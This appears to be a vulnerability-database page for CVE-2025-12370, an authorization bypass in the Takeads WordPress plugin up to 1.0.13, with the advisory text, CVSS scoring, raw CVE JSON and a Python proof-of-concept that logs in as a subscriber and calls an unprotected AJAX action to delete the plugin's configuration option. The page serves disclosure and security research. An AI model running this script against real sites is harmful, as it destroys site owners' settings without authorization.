Security Vulnerability Report
中文
CVE-2025-12370 CVSS 4.3 MEDIUM

CVE-2025-12370

Published: 2025-12-05 06:16:07
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The Takeads plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 1.0.13. This is due to the plugin not properly verifying that a user is authorized to perform an action. This makes it possible for authenticated attackers, with subscriber-level access and above, to delete the plugin's configuration options.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Takeads plugin for WordPress <= 1.0.13

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2025-12370 PoC - Takeads Plugin Authorization Bypass # Target: WordPress site with Takeads plugin < 1.0.14 TARGET_URL = "http://target-wordpress-site.com" USERNAME = "subscriber_user" PASSWORD = "password" def get_nonce_and_cookie(): """Login to WordPress and get authentication cookie""" session = requests.Session() login_url = f"{TARGET_URL}/wp-login.php" login_data = { "log": USERNAME, "pwd": PASSWORD, "wp-submit": "Log In", "redirect_to": "/wp-admin/", "testcookie": "1" } session.post(login_url, data=login_data) return session.cookies.get_dict() def exploit_authorization_bypass(cookies): """ Exploit the authorization bypass to delete plugin options The vulnerable AJAX action lacks capability check """ exploit_url = f"{TARGET_URL}/wp-admin/admin-ajax.php" # Delete plugin configuration options exploit_data = { "action": "mlp_delete_option", # Vulnerable action "option_name": "monetize_link_options" # Target option to delete } response = requests.post(exploit_url, data=exploit_data, cookies=cookies) print(f"Response Status: {response.status_code}") print(f"Response: {response.text}") return response def main(): print("[*] CVE-2025-12370 Takeads Plugin Authorization Bypass PoC") print("[*] Target: Takeads plugin < 1.0.14") cookies = get_nonce_and_cookie() if cookies: print("[+] Successfully authenticated as subscriber") exploit_authorization_bypass(cookies) else: print("[-] Authentication failed") if __name__ == "__main__": main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12370", "sourceIdentifier": "[email protected]", "published": "2025-12-05T06:16:07.233", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Takeads plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 1.0.13. This is due to the plugin not properly verifying that a user is authorized to perform an action. This makes it possible for authenticated attackers, with subscriber-level access and above, to delete the plugin's configuration options."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/monetize-link/tags/1.0.13/src/MLP_Ajax.php#L8", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/9f3619d9-7572-439e-a284-d59ef5de08f3?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.